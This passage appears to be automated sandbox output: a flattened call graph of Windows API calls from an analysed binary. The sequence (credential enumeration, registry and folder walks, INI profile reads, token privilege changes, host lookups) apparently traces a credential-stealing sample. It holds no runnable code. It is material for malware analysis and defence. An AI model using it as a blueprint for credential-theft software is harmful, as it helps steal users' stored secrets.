5293->5295 5297 bc08d3d LocalFree 5295->5297 5296 bc025f0 5298 bc08c6d lstrlenA 5296->5298 5299 bc02688 5297->5299 5300 bc025fa 5298->5300 5302 bc08d3d LocalFree 5299->5302 5301 bc08c6d lstrlenA 5300->5301 5304 bc02604 5301->5304 5303 bc02690 5302->5303 5305 bc08d3d LocalFree 5303->5305 5307 bc08c6d lstrlenA 5304->5307 5308 bc0261a 5304->5308 5306 bc023f7 5305->5306 5306->5233 5307->5308 5309 bc08c6d lstrlenA 5308->5309 5309->5310 5310->5288 5312 bc08c79 lstrlenA 5311->5312 5313 bc08c8a 5311->5313 5312->5313 5313->5296 5314->5249 5329 bc08fb7 ExpandEnvironmentStringsA 5315->5329 5318 bc01f6b 5318->5263 5320 bc01f1f 5321 bc01f23 5320->5321 5322 bc01f65 5320->5322 5341 bc08ff4 5321->5341 5323 bc08d3d LocalFree 5322->5323 5323->5318 5326 bc01f45 5355 bc0907f 5326->5355 5330 bc08fd2 5329->5330 5335 bc01f11 5329->5335 5358 bc08d51 LocalAlloc 5330->5358 5332 bc08fd7 ExpandEnvironmentStringsA 5333 bc08fe4 5332->5333 5332->5335 5334 bc08d3d LocalFree 5333->5334 5334->5335 5335->5318 5336 bc090fc 5335->5336 5337 bc09102 5336->5337 5338 bc09128 5336->5338 5337->5338 5339 bc09106 CreateFileA 5337->5339 5338->5320 5339->5338 5340 bc0911d FindCloseChangeNotification 5339->5340 5340->5320 5359 bc08d5e 5341->5359 5343 bc09004 CreateFileA 5344 bc01f2c 5343->5344 5345 bc09026 GetFileSize CreateFileMappingA 5343->5345 5344->5322 5344->5326 5349 bc0909f 5344->5349 5346 bc09042 MapViewOfFile 5345->5346 5347 bc09069 CloseHandle 5345->5347 5346->5344 5348 bc09058 CloseHandle CloseHandle 5346->5348 5347->5344 5348->5344 5350 bc090b2 5349->5350 5351 bc090aa 5349->5351 5353 bc090ce LocalAlloc 5350->5353 5354 bc090f1 5350->5354 5360 bc0930f 5351->5360 5353->5354 5354->5326 5356 bc09084 UnmapViewOfFile CloseHandle CloseHandle 5355->5356 5357 bc0909e 5355->5357 5356->5357 5357->5322 5358->5332 5359->5343 5361 bc09325 5360->5361 5362 bc09fdc __except_handler4 5 API calls 5361->5362 5363 bc0937e 5362->5363 5363->5350 5364->4776 5366 bc02014 5365->5366 5367 bc02156 5365->5367 5366->5367 5370 bc08f95 lstrlenA 5366->5370 5368 bc08d3d LocalFree 5367->5368 5369 bc0215f 5368->5369 5371 bc09fdc __except_handler4 5 API calls 5369->5371 5372 bc02022 5370->5372 5373 bc02171 5371->5373 5374 bc08ee2 5 API calls 5372->5374 5373->4783 5375 bc02036 5374->5375 5376 bc0204c FindFirstFileA 5375->5376 5376->5367 5385 bc02068 5376->5385 5377 bc02074 lstrcmpiA 5379 bc02135 FindNextFileA 5377->5379 5380 bc0208e lstrcmpiA 5377->5380 5378 bc020e6 StrStrIA 5378->5379 5378->5385 5381 bc0214c FindClose 5379->5381 5379->5385 5380->5379 5380->5385 5381->5367 5382 bc08ee2 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 5382->5385 5383 bc08f95 lstrlenA 5383->5385 5384 bc01f01 22 API calls 5384->5385 5385->5377 5385->5378 5385->5379 5385->5382 5385->5383 5385->5384 5386 bc08f32 6 API calls 5385->5386 5387 bc08d3d LocalFree 5385->5387 5388 bc01fd3 42 API calls 5385->5388 5403 bc02b0b CreateStreamOnHGlobal 5385->5403 5386->5385 5387->5385 5388->5385 5391 bc0713b 5390->5391 5392 bc08c6d lstrlenA 5391->5392 5393 bc07145 5392->5393 5394 bc08c6d lstrlenA 5393->5394 5396 bc0714f 5394->5396 5395 bc07170 StrStrIA 5397 bc07184 lstrlenA StrStrIA 5395->5397 5402 bc071ce 5395->5402 5396->5395 5398 bc0719d 5397->5398 5490 bc01798 inet_addr 5398->5490 5400 bc071ab 5401 bc08c6d lstrlenA 5400->5401 5400->5402 5401->5402 5402->4779 5404 bc08a86 8 API calls 5403->5404 5405 bc02b2a 5404->5405 5406 bc02b42 5405->5406 5408 bc037e4 5405->5408 5406->5385 5412 bc03816 5408->5412 5409 bc0395d 5410 bc09fdc __except_handler4 5 API calls 5409->5410 5411 bc03970 5410->5411 5411->5406 5412->5409 5414 bc0341e 5412->5414 5415 bc03433 5414->5415 5417 bc0343b 5414->5417 5415->5409 5416 bc03525 LocalAlloc 5418 bc03540 5416->5418 5417->5415 5417->5416 5426 bc0358b 5418->5426 5427 bc035a9 5418->5427 5430 bc03635 5418->5430 5419 bc08d3d LocalFree 5419->5415 5420 bc03777 5423 bc08d3d LocalFree 5420->5423 5421 bc03611 5422 bc0341e 8 API calls 5421->5422 5424 bc03625 5422->5424 5425 bc03780 5423->5425 5424->5420 5424->5426 5426->5419 5427->5421 5427->5426 5428 bc0341e 8 API calls 5427->5428 5428->5427 5430->5420 5430->5426 5432 bc08d3d LocalFree 5430->5432 5434 bc02fb8 5430->5434 5441 bc03294 5430->5441 5457 bc02b55 5430->5457 5432->5430 5435 bc02fd6 5434->5435 5436 bc02fcf 5434->5436 5467 bc08d51 LocalAlloc 5435->5467 5436->5430 5438 bc02fdb CreateStreamOnHGlobal 5440 bc02ff7 5438->5440 5439 bc08d3d LocalFree 5439->5436 5440->5439 5442 bc033dc 5441->5442 5443 bc032b4 5441->5443 5442->5430 5443->5442 5468 bc08d51 LocalAlloc 5443->5468 5445 bc0340e 5446 bc08d3d LocalFree 5445->5446 5446->5442 5447 bc033cc 5448 bc08d3d LocalFree 5447->5448 5448->5442 5450 bc0331e 5450->5445 5450->5447 5469 bc08d51 LocalAlloc 5450->5469 5452 bc033e2 5454 bc08d3d LocalFree 5452->5454 5455 bc033f0 5452->5455 5453 bc0338a 5453->5447 5453->5452 5453->5455 5470 bc030f9 5453->5470 5454->5455 5455->5445 5456 bc08d3d LocalFree 5455->5456 5456->5455 5458 bc02b68 5457->5458 5466 bc02c55 5457->5466 5459 bc02b8a lstrcmpiA 5458->5459 5458->5466 5460 bc02ba0 5459->5460 5459->5466 5461 bc02bb6 lstrcmpA 5460->5461 5460->5466 5462 bc02bcc 5461->5462 5461->5466 5462->5466 5488 bc03786 StrStrIA 5462->5488 5465 bc0341e 7 API calls 5465->5466 5466->5430 5467->5438 5468->5450 5469->5453 5471 bc03110 5470->5471 5472 bc031c9 5470->5472 5473 bc03189 5471->5473 5474 bc03132 5471->5474 5475 bc03117 5471->5475 5479 bc031df 5472->5479 5480 bc03213 5472->5480 5483 bc08d51 LocalAlloc 5473->5483 5478 bc030c7 LocalAlloc GetModuleHandleA GetProcAddress 5474->5478 5477 bc08d51 LocalAlloc 5475->5477 5476 bc0311f 5476->5453 5477->5476 5478->5476 5481 bc08d51 LocalAlloc 5479->5481 5480->5476 5482 bc08d51 LocalAlloc 5480->5482 5484 bc031eb 5481->5484 5482->5484 5483->5476 5485 bc030c7 LocalAlloc GetModuleHandleA GetProcAddress 5484->5485 5486 bc03202 5485->5486 5487 bc08d3d LocalFree 5486->5487 5487->5476 5489 bc02c1f 5488->5489 5489->5465 5489->5466 5491 bc017b9 5490->5491 5492 bc017ac gethostbyname 5490->5492 5491->5400 5492->5491 5506 bc02aca 5493->5506 5496 bc02aca 50 API calls 5497 bc02a8f 5496->5497 5498 bc02aca 50 API calls 5497->5498 5499 bc02a9b 5498->5499 5500 bc02aca 50 API calls 5499->5500 5501 bc02aa7 5500->5501 5502 bc02aca 50 API calls 5501->5502 5503 bc02ab6 5502->5503 5504 bc02aca 50 API calls 5503->5504 5505 bc02ac2 5504->5505 5505->4788 5515 bc091be LocalAlloc SHGetFolderPathA 5506->5515 5508 bc02a7e 5508->5496 5509 bc02ad7 5509->5508 5510 bc08f32 6 API calls 5509->5510 5511 bc02ae5 5510->5511 5512 bc01fd3 48 API calls 5511->5512 5513 bc02afd 5512->5513 5514 bc08d3d LocalFree 5513->5514 5514->5508 5515->5509 5517 bc08dda 6 API calls 5516->5517 5518 bc057e1 5517->5518 5519 bc05828 5518->5519 5527 bc05782 5518->5527 5519->4793 5522 bc05782 50 API calls 5523 bc0580a 5522->5523 5524 bc05782 50 API calls 5523->5524 5525 bc0581a 5524->5525 5526 bc08d3d LocalFree 5525->5526 5526->5519 5536 bc091be LocalAlloc SHGetFolderPathA 5527->5536 5529 bc0578e 5530 bc08f32 6 API calls 5529->5530 5535 bc057bf 5529->5535 5531 bc0579c 5530->5531 5532 bc01fd3 48 API calls 5531->5532 5533 bc057b6 5532->5533 5534 bc08d3d LocalFree 5533->5534 5534->5535 5535->5522 5536->5529 5538 bc06921 LocalAlloc RegOpenKeyA 5537->5538 5539 bc068bc 5537->5539 5541 bc069d2 5538->5541 5556 bc0694b 5538->5556 5540 bc08ebd 6 API calls 5539->5540 5542 bc068cd 5540->5542 5543 bc08d3d LocalFree 5541->5543 5542->5538 5566 bc0914b 5542->5566 5546 bc069db 5543->5546 5544 bc069ba RegEnumKeyExA 5545 bc069c8 RegCloseKey 5544->5545 5544->5556 5545->5541 5546->4799 5548 bc08ee2 5 API calls 5548->5556 5550 bc08f32 6 API calls 5550->5556 5551 bc08d3d LocalFree 5554 bc06920 5551->5554 5553 bc0689e 86 API calls 5553->5556 5554->5538 5555 bc068ec 5559 bc08f32 6 API calls 5555->5559 5565 bc0690f 5555->5565 5556->5544 5556->5548 5556->5550 5556->5553 5557 bc08d3d LocalFree 5556->5557 5557->5556 5558 bc08d3d LocalFree 5560 bc06916 5558->5560 5561 bc068fa 5559->5561 5560->5551 5579 bc06713 5561->5579 5564 bc08d3d LocalFree 5564->5565 5565->5558 5567 bc08ee2 5 API calls 5566->5567 5568 bc0915e lstrlenA 5567->5568 5569 bc09171 5568->5569 5570 bc09184 StrStrIA 5568->5570 5569->5570 5613 bc08dbd GetModuleHandleA GetProcAddress 5569->5613 5571 bc09196 5570->5571 5572 bc09199 StrRChrIA 5570->5572 5571->5572 5574 bc091a7 lstrlenA 5572->5574 5577 bc068de 5574->5577 5577->5560 5578 bc091be LocalAlloc SHGetFolderPathA 5577->5578 5578->5555 5614 bc0912b 5579->5614 5582 bc0912b GetFileAttributesA 5583 bc06736 5582->5583 5584 bc08f95 lstrlenA 5583->5584 5610 bc06896 5583->5610 5585 bc06743 5584->5585 5586 bc08ee2 5 API calls 5585->5586 5587 bc06756 5586->5587 5588 bc08ee2 5 API calls 5587->5588 5589 bc06765 LocalAlloc LocalAlloc 5588->5589 5590 bc090fc 2 API calls 5589->5590 5591 bc06791 5590->5591 5592 bc06865 5591->5592 5593 bc06799 GetPrivateProfileSectionNamesA 5591->5593 5594 bc08d3d LocalFree 5592->5594 5593->5592 5595 bc067b1 5593->5595 5596 bc0686d 5594->5596 5595->5592 5597 bc067bc StrStrIA 5595->5597 5598 bc08d3d LocalFree 5596->5598 5599 bc067d0 GetPrivateProfileStringA 5597->5599 5600 bc06851 lstrlenA 5597->5600 5601 bc06874 5598->5601 5599->5600 5602 bc067ee GetPrivateProfileIntA 5599->5602 5600->5592 5600->5597 5603 bc08d3d LocalFree 5601->5603 5611 bc06804 5602->5611 5604 bc0687d 5603->5604 5607 bc08d3d LocalFree 5604->5607 5605 bc06401 66 API calls 5605->5611 5606 bc08ee2 5 API calls 5606->5611 5608 bc06884 5607->5608 5618 bc06401 5608->5618 5610->5564 5611->5600 5611->5605 5611->5606 5612 bc08d3d LocalFree 5611->5612 5612->5611 5615 bc06726 5614->5615 5616 bc0912f 5614->5616 5615->5582 5615->5610 5616->5615 5617 bc09134 GetFileAttributesA 5616->5617 5617->5615 5619 bc06443 5618->5619 5620 bc066f4 5618->5620 5619->5620 5621 bc08f95 lstrlenA 5619->5621 5622 bc08d3d LocalFree 5620->5622 5623 bc06453 5621->5623 5624 bc06703 5622->5624 5626 bc08ee2 5 API calls 5623->5626 5625 bc09fdc __except_handler4 5 API calls 5624->5625 5627 bc06711 5625->5627 5628 bc06467 5626->5628 5627->5610 5629 bc06481 FindFirstFileA 5628->5629 5629->5620 5647 bc064a3 5629->5647 5630 bc064b7 lstrcmpiA 5633 bc066cd FindNextFileA 5630->5633 5634 bc064cd lstrcmpiA 5630->5634 5631 bc06585 StrStrIA 5636 bc06610 lstrlenA 5631->5636 5631->5647 5632 bc06539 StrStrIA 5632->5633 5632->5647 5635 bc066e8 FindClose 5633->5635 5633->5647 5634->5633 5634->5647 5635->5620 5639 bc06631 StrStrIA 5636->5639 5636->5647 5637 bc08f95 lstrlenA 5637->5647 5638 bc08ee2 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 5638->5647 5640 bc06662 StrStrIA StrStrIA StrStrIA 5639->5640 5639->5647 5640->5647 5641 bc01f01 22 API calls 5641->5647 5642 bc090fc 2 API calls 5642->5647 5643 bc08d3d LocalFree 5643->5647 5644 bc08f32 6 API calls 5644->5647 5646 bc06401 54 API calls 5646->5647 5647->5630 5647->5631 5647->5632 5647->5633 5647->5636 5647->5637 5647->5638 5647->5639 5647->5640 5647->5641 5647->5642 5647->5643 5647->5644 5647->5646 5649 bc065d0 5647->5649 5651 bc01f70 5647->5651 5649->5647 5664 bc061df lstrlenA 5649->5664 5668 bc06d60 CreateStreamOnHGlobal 5649->5668 5652 bc08fb7 4 API calls 5651->5652 5653 bc01f83 5652->5653 5654 bc090fc 2 API calls 5653->5654 5660 bc01fcb 5653->5660 5655 bc01f91 5654->5655 5656 bc01fc5 5655->5656 5657 bc08ff4 7 API calls 5655->5657 5658 bc08d3d LocalFree 5656->5658 5659 bc01f9e 5657->5659 5658->5660 5659->5656 5661 bc01fb7 5659->5661 5662 bc0909f 6 API calls 5659->5662 5660->5647 5663 bc0907f 3 API calls 5661->5663 5662->5661 5663->5656 5665 bc061fa 5664->5665 5666 bc0620c 11 API calls 5664->5666 5665->5666 5667 bc062aa 5666->5667 5667->5649 5669 bc08a86 8 API calls 5668->5669 5670 bc06d7e 5669->5670 5671 bc06d98 5670->5671 5672 bc037e4 14 API calls 5670->5672 5671->5649 5672->5671 5675 bc0896c 5673->5675 5674 bc09fdc __except_handler4 5 API calls 5676 bc0601a 5674->5676 5675->5674 5676->4807 5678 bc05c1d 5677->5678 5685 bc05b79 5677->5685 5679 bc09fdc __except_handler4 5 API calls 5678->5679 5682 bc05c27 5679->5682 5680 bc05bf9 RegEnumKeyExA 5681 bc05c0f RegCloseKey 5680->5681 5680->5685 5681->5678 5682->4822 5683 bc08ee2 5 API calls 5683->5685 5684 bc08f32 6 API calls 5684->5685 5685->5680 5685->5683 5685->5684 5687 bc08d3d LocalFree 5685->5687 5703 bc058d5 5685->5703 5687->5685 5689 bc05d1f 5688->5689 5697 bc05c6f 5688->5697 5690 bc09fdc __except_handler4 5 API calls 5689->5690 5692 bc05d29 5690->5692 5691 bc05cfb RegEnumKeyExA 5693 bc05d11 RegCloseKey 5691->5693 5691->5697 5692->4828 5693->5689 5694 bc08ee2 5 API calls 5694->5697 5695 bc08f32 6 API calls 5695->5697 5696 bc05b39 33 API calls 5696->5697 5697->5691 5697->5694 5697->5695 5697->5696 5698 bc08d3d LocalFree 5697->5698 5698->5697 5701 bc04a98 5699->5701 5700 bc04af9 5700->4817 5701->5700 5764 bc049ee 5701->5764 5705 bc0595d 5703->5705 5704 bc08ebd 6 API calls 5704->5705 5705->5704 5707 bc059a1 5705->5707 5708 bc08d3d LocalFree 5705->5708 5722 bc05890 5705->5722 5709 bc08ebd 6 API calls 5707->5709 5711 bc08c6d lstrlenA 5707->5711 5713 bc05a14 5707->5713 5714 bc08d3d LocalFree 5707->5714 5708->5705 5709->5707 5710 bc08ebd 6 API calls 5710->5713 5711->5707 5712 bc08d3d LocalFree 5712->5713 5713->5710 5713->5712 5717 bc05890 8 API calls 5713->5717 5720 bc05aa3 5713->5720 5731 bc021b7 5713->5731 5714->5707 5715 bc08ebd 6 API calls 5715->5720 5717->5713 5718 bc05b16 5718->5685 5719 bc08c6d lstrlenA 5719->5720 5720->5715 5720->5718 5720->5719 5721 bc08d3d LocalFree 5720->5721 5721->5720 5739 bc09c42 5722->5739 5724 bc058ca 5724->5705 5725 bc058a1 5725->5724 5726 bc08c6d lstrlenA 5725->5726 5727 bc058bc 5726->5727 5728 bc08c6d lstrlenA 5727->5728 5729 bc058c4 5728->5729 5730 bc08d3d LocalFree 5729->5730 5730->5724 5732 bc0220e 5731->5732 5733 bc021cf 5731->5733 5732->5713 5761 bc01000 LoadLibraryA GetProcAddress 5733->5761 5735 bc021df 5735->5732 5736 bc02205 LocalFree 5735->5736 5763 bc08dbd GetModuleHandleA GetProcAddress 5735->5763 5736->5732 5740 bc09c46 5739->5740 5741 bc09c7c 5739->5741 5740->5741 5742 bc09c4a IsTextUnicode 5740->5742 5741->5725 5743 bc09c66 5742->5743 5744 bc09c59 5742->5744 5759 bc08d51 LocalAlloc 5743->5759 5750 bc09be0 5744->5750 5747 bc09c60 5747->5725 5748 bc09c6e 5749 bc08d91 2 API calls 5748->5749 5749->5747 5751 bc09bf3 WideCharToMultiByte 5750->5751 5752 bc09bef 5750->5752 5751->5752 5753 bc09c0f 5751->5753 5752->5747 5760 bc08d51 LocalAlloc 5753->5760 5755 bc09c14 5755->5752 5756 bc09c1b WideCharToMultiByte 5755->5756 5756->5752 5757 bc09c2d 5756->5757 5758 bc08d3d LocalFree 5757->5758 5758->5752 5759->5748 5760->5755 5762 bc01020 5761->5762 5762->5735 5766 bc04a0c 5764->5766 5765 bc04a72 5765->5701 5766->5765 5768 bc0495e 5766->5768 5769 bc049e1 5768->5769 5770 bc0496c 5768->5770 5769->5766 5770->5769 5771 bc049b3 CoTaskMemFree 5770->5771 5771->5770 5775 bc05151 5772->5775 5777 bc050c5 5772->5777 5773 bc04e17 28 API calls 5774 bc05171 5773->5774 5781 bc05178 5774->5781 5775->5773 5776 bc05117 StrStrIW 5776->5777 5777->5775 5777->5776 5802 bc04e17 5777->5802 5780 bc0514a CoTaskMemFree 5780->5777 5782 bc051b3 CredEnumerateA 5781->5782 5783 bc05194 5781->5783 5784 bc0525e 5782->5784 5787 bc051d5 5782->5787 5783->5782 5785 bc09fdc __except_handler4 5 API calls 5784->5785 5786 bc0526a 5785->5786 5793 bc0526c LoadLibraryA 5786->5793 5787->5784 5788 bc05255 CredFree 5787->5788 5790 bc051ea 5787->5790 5788->5784 5789 bc01000 2 API calls 5789->5790 5790->5788 5790->5789 5862 bc04b5f 5790->5862 5792 bc05243 LocalFree 5792->5790 5794 bc052a0 7 API calls 5793->5794 5795 bc05538 5793->5795 5798 bc05316 5794->5798 5796 bc09fdc __except_handler4 5 API calls 5795->5796 5797 bc05545 5796->5797 5797->4860 5798->5795 5800 bc0538a 5798->5800 5799 bc053a5 GetVersionExA 5799->5800 5800->5798 5800->5799 5801 bc04bbb lstrlenW lstrlenW lstrlenW 5800->5801 5801->5800 5803 bc088c9 8 API calls 5802->5803 5804 bc04e3f lstrlenW 5803->5804 5806 bc04e63 LocalFree 5804->5806 5807 bc04e69 5804->5807 5809 bc09fdc __except_handler4 5 API calls 5806->5809 5824 bc04f4f lstrlenW 5807->5824 5811 bc04f4d CoTaskMemFree 5809->5811 5811->5777 5811->5780 5813 bc08dda 6 API calls 5814 bc04e9b 5813->5814 5815 bc04ebb 5814->5815 5816 bc08dda 6 API calls 5814->5816 5815->5806 5817 bc04f31 5815->5817 5818 bc04eca lstrlenW 5815->5818 5816->5815 5819 bc08d3d LocalFree 5817->5819 5820 bc01000 2 API calls 5818->5820 5819->5806 5821 bc04ef5 5820->5821 5821->5817 5834 bc04b07 5821->5834 5823 bc04f25 LocalFree 5823->5817 5825 bc04fd7 5824->5825 5826 bc04fbf 5824->5826 5838 bc087fe 5825->5838 5826->5825 5848 bc08768 5826->5848 5829 bc04fe6 5830 bc0501d wsprintfA lstrcpyA 5829->5830 5830->5830 5831 bc05062 wsprintfA lstrcpyA 5830->5831 5832 bc09fdc __except_handler4 5 API calls 5831->5832 5833 bc04e81 5832->5833 5833->5813 5860 bc08c37 5834->5860 5836 bc04b13 lstrlenW 5837 bc04b27 5836->5837 5837->5823 5839 bc08816 5838->5839 5839->5839 5840 bc08768 7 API calls 5839->5840 5841 bc0884d 5840->5841 5842 bc08873 5841->5842 5843 bc08768 7 API calls 5841->5843 5844 bc08768 7 API calls 5842->5844 5843->5841 5845 bc0887f 5844->5845 5846 bc09fdc __except_handler4 5 API calls 5845->5846 5847 bc088c7 5846->5847 5847->5829 5849 bc08780 5848->5849 5850 bc087df 5849->5850 5859 bc08dbd GetModuleHandleA GetProcAddress 5849->5859 5858 bc08dbd GetModuleHandleA GetProcAddress 5850->5858 5854 bc087f6 5854->5826 5861 bc08c49 5860->5861 5861->5836 5863 bc08c37 5862->5863 5864 bc04b70 lstrlenA 5863->5864 5865 bc04b83 5864->5865 5865->5792 5867 bc08ebd 6 API calls 5866->5867 5868 bc03fe7 5867->5868 5869 bc08f95 lstrlenA 5868->5869 5886 bc04059 5868->5886 5870 bc03ff5 5869->5870 5871 bc04004 5870->5871 5872 bc08f32 6 API calls 5870->5872 5873 bc08ee2 5 API calls 5871->5873 5872->5871 5874 bc04013 5873->5874 5898 bc03fb2 5874->5898 5877 bc08ee2 5 API calls 5878 bc0402c 5877->5878 5879 bc03fb2 22 API calls 5878->5879 5880 bc0403a 5879->5880 5881 bc08ee2 5 API calls 5880->5881 5882 bc04045 5881->5882 5883 bc03fb2 22 API calls 5882->5883 5884 bc04053 5883->5884 5885 bc08d3d LocalFree 5884->5885 5885->5886 5886->4866 5904 bc091be LocalAlloc SHGetFolderPathA 5887->5904 5889 bc040d9 5890 bc0411f 5889->5890 5905 bc0405f 5889->5905 5890->4902 5893 bc0405f 30 API calls 5894 bc04106 5893->5894 5895 bc0405f 30 API calls 5894->5895 5896 bc04119 5895->5896 5897 bc08d3d LocalFree 5896->5897 5897->5890 5899 bc03fd1 5898->5899 5900 bc03fbb 5898->5900 5899->5877 5901 bc01f01 22 API calls 5900->5901 5902 bc03fc9 5901->5902 5903 bc08d3d LocalFree 5902->5903 5903->5899 5904->5889 5906 bc08ee2 5 API calls 5905->5906 5907 bc0406f 5906->5907 5908 bc08f32 6 API calls 5907->5908 5909 bc04078 5908->5909 5910 bc03fb2 22 API calls 5909->5910 5911 bc04084 5910->5911 5912 bc08ee2 5 API calls 5911->5912 5913 bc04091 5912->5913 5914 bc08f32 6 API calls 5913->5914 5915 bc0409a 5914->5915 5916 bc03fb2 22 API calls 5915->5916 5917 bc040a6 5916->5917 5918 bc08ee2 5 API calls 5917->5918 5919 bc040b3 5918->5919 5920 bc08f32 6 API calls 5919->5920 5921 bc040bc 5920->5921 5922 bc03fb2 22 API calls 5921->5922 5923 bc040c8 5922->5923 5923->5893 5924->4910 5959 bc091be LocalAlloc SHGetFolderPathA 5925->5959 5927 bc03e9c 5928 bc08ee2 5 API calls 5927->5928 5953 bc03f19 5927->5953 5929 bc03eae 5928->5929 5960 bc03d27 5929->5960 5932 bc08d3d LocalFree 5933 bc03ebe 5932->5933 5934 bc08ee2 5 API calls 5933->5934 5935 bc03eca 5934->5935 5936 bc03d27 35 API calls 5935->5936 5937 bc03ed3 5936->5937 5938 bc08d3d LocalFree 5937->5938 5939 bc03eda 5938->5939 5940 bc08ee2 5 API calls 5939->5940 5941 bc03ee6 5940->5941 5942 bc03d27 35 API calls 5941->5942 5943 bc03eef 5942->5943 5944 bc08d3d LocalFree 5943->5944 5945 bc03ef6 5944->5945 5946 bc08ee2 5 API calls 5945->5946 5947 bc03f02 5946->5947 5948 bc03d27 35 API calls 5947->5948 5949 bc03f0b 5948->5949 5950 bc08d3d LocalFree 5949->5950 5951 bc03f12 5950->5951 5952 bc08d3d LocalFree 5951->5952 5952->5953 5953->4922 5955 bc08dda 6 API calls 5954->5955 5956 bc03d01 5955->5956 5957 bc08d3d LocalFree 5956->5957 5958 bc03d21 5956->5958 5957->5958 5958->4930 5959->5927 5961 bc03e72 5960->5961 5962 bc03d54 5960->5962 5963 bc08d3d LocalFree 5961->5963 5962->5961 5965 bc08ee2 5 API calls 5962->5965 5964 bc03e7d 5963->5964 5966 bc09fdc __except_handler4 5 API calls 5964->5966 5967 bc03d6a 5965->5967 5968 bc03e8a 5966->5968 5969 bc01f01 22 API calls 5967->5969 5968->5932 5970 bc03d82 5969->5970 5971 bc08d3d LocalFree 5970->5971 5972 bc03d8d 5971->5972 5973 bc08ee2 5 API calls 5972->5973 5974 bc03d98 5973->5974 5975 bc03db4 FindFirstFileA 5974->5975 5975->5961 5976 bc03dd6 5975->5976 5977 bc03e4b FindNextFileA 5976->5977 5978 bc03ddf lstrcmpiA 5976->5978 5977->5976 5979 bc03e66 FindClose 5977->5979 5978->5977 5980 bc03df5 lstrcmpiA 5978->5980 5979->5961 5980->5977 5984 bc03e0b 5980->5984 5981 bc08ee2 5 API calls 5981->5984 5982 bc08f32 6 API calls 5982->5984 5983 bc01f01 22 API calls 5983->5984 5984->5977 5984->5981 5984->5982 5984->5983 5985 bc08d3d LocalFree 5984->5985 5985->5984 5987 bc042d9 5986->5987 6039 bc04417 5986->6039 5988 bc08f95 lstrlenA 5987->5988 5989 bc042de 5988->5989 5990 bc042ed 5989->5990 5991 bc08f32 6 API calls 5989->5991 5992 bc08ebd 6 API calls 5990->5992 5991->5990 5993 bc0430c 5992->5993 5995 bc08ee2 5 API calls 5993->5995 6013 bc04337 5993->6013 5994 bc08dda 6 API calls 5996 bc0434b 5994->5996 5997 bc0431d 5995->5997 5998 bc04376 5996->5998 6001 bc08ee2 5 API calls 5996->6001 5999 bc042b1 22 API calls 5997->5999 6000 bc08dda 6 API calls 5998->6000 6002 bc04329 5999->6002 6003 bc0438a 6000->6003 6004 bc0435c 6001->6004 6005 bc08d3d LocalFree 6002->6005 6007 bc043b5 6003->6007 6010 bc08ee2 5 API calls 6003->6010 6008 bc042b1 22 API calls 6004->6008 6006 bc04331 6005->6006 6009 bc08d3d LocalFree 6006->6009 6012 bc08ebd 6 API calls 6007->6012 6011 bc04368 6008->6011 6009->6013 6014 bc0439b 6010->6014 6015 bc08d3d LocalFree 6011->6015 6016 bc043c6 6012->6016 6013->5994 6017 bc042b1 22 API calls 6014->6017 6018 bc04370 6015->6018 6019 bc043ee 6016->6019 6023 bc08ee2 5 API calls 6016->6023 6020 bc043a7 6017->6020 6022 bc08d3d LocalFree 6018->6022 6021 bc08ee2 5 API calls 6019->6021 6025 bc08d3d LocalFree 6020->6025 6026 bc043fe 6021->6026 6022->5998 6024 bc043d7 6023->6024 6027 bc042b1 22 API calls 6024->6027 6028 bc043af 6025->6028 6029 bc042b1 22 API calls 6026->6029 6030 bc043e2 6027->6030 6031 bc08d3d LocalFree 6028->6031 6032 bc04409 6029->6032 6033 bc08d3d LocalFree 6030->6033 6031->6007 6034 bc08d3d LocalFree 6032->6034 6035 bc043e8 6033->6035 6036 bc0440f 6034->6036 6037 bc08d3d LocalFree 6035->6037 6038 bc08d3d LocalFree 6036->6038 6037->6019 6038->6039 6039->4994 6040->4997 6041->5001 6042->5006 6043->5012 6045 bc01f01 22 API calls 6044->6045 6046 bc042c4 6045->6046 6046->5029 6048 bc048d0 6047->6048 6059 bc0464b 6047->6059 6050 bc09fdc __except_handler4 5 API calls 6048->6050 6049 bc048a5 RegEnumKeyExA 6052 bc048c3 RegCloseKey 6049->6052 6049->6059 6051 bc048dc 6050->6051 6051->5063 6052->6048 6053 bc08ee2 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 6053->6059 6054 bc08dda 6 API calls 6054->6059 6055 bc08ebd 6 API calls 6055->6059 6056 bc08d3d LocalFree 6056->6059 6057 bc0460a 16 API calls 6057->6059 6058 bc08c6d lstrlenA 6058->6059 6059->6049 6059->6053 6059->6054 6059->6055 6059->6056 6059->6057 6059->6058 6069 bc091be LocalAlloc SHGetFolderPathA 6060->6069 6062 bc02182 6063 bc021b2 6062->6063 6064 bc08f32 6 API calls 6062->6064 6063->5089 6065 bc02192 6064->6065 6066 bc01fd3 48 API calls 6065->6066 6067 bc021a9 6066->6067 6068 bc08d3d LocalFree 6067->6068 6068->6063 6069->6062 6071 bc03c26 6070->6071 6072 bc039a7 RegEnumKeyExA 6070->6072 6074 bc09fdc __except_handler4 5 API calls 6071->6074 6073 bc03c19 RegCloseKey 6072->6073 6078 bc039e1 6072->6078 6073->6071 6075 bc03c31 6074->6075 6075->5105 6076 bc08ee2 5 API calls 6076->6078 6077 bc08f32 6 API calls 6077->6078 6078->6076 6078->6077 6079 bc08dda 6 API calls 6078->6079 6080 bc08d3d LocalFree 6078->6080 6081 bc08c6d lstrlenA 6078->6081 6082 bc08d3d LocalFree 6078->6082 6079->6078 6080->6078 6081->6078 6083 bc03bd9 RegEnumKeyExA 6082->6083 6083->6078 6084 bc03c18 6083->6084 6084->6073 6085->4655 6086->4657 6087->4685 6088->4698 6089->4620 6091 bc09bc2 6090->6091 6092 bc09b7d GetCurrentProcess OpenProcessToken 6090->6092 6094 bc09bd0 6091->6094 6095 bc09bc7 CloseHandle 6091->6095 6092->6091 6093 bc09b94 AdjustTokenPrivileges 6092->6093 6093->6091 6096 bc09fdc __except_handler4 5 API calls 6094->6096 6095->6094 6097 bc09bde 6096->6097 6097->4569 6101 bc08d51 LocalAlloc 6098->6101 6100 bc091f8 lstrcpyA 6100->4568 6101->6100 6263 bc06aa8 6264 bc06c52 6263->6264 6265 bc06ab9 6263->6265 6265->6264 6293 bc08d51 LocalAlloc 6265->6293 6267 bc06b3c 6268 bc08d91 2 API calls 6267->6268 6269 bc06b4b 6268->6269 6270 bc06b54 lstrlenA StrCmpNIA 6269->6270 6271 bc06b95 6269->6271 6272 bc06b71 lstrlenA StrCmpNIA 6270->6272 6275 bc06bb1 6270->6275 6273 bc06b9a lstrlenA StrCmpNIA 6271->6273 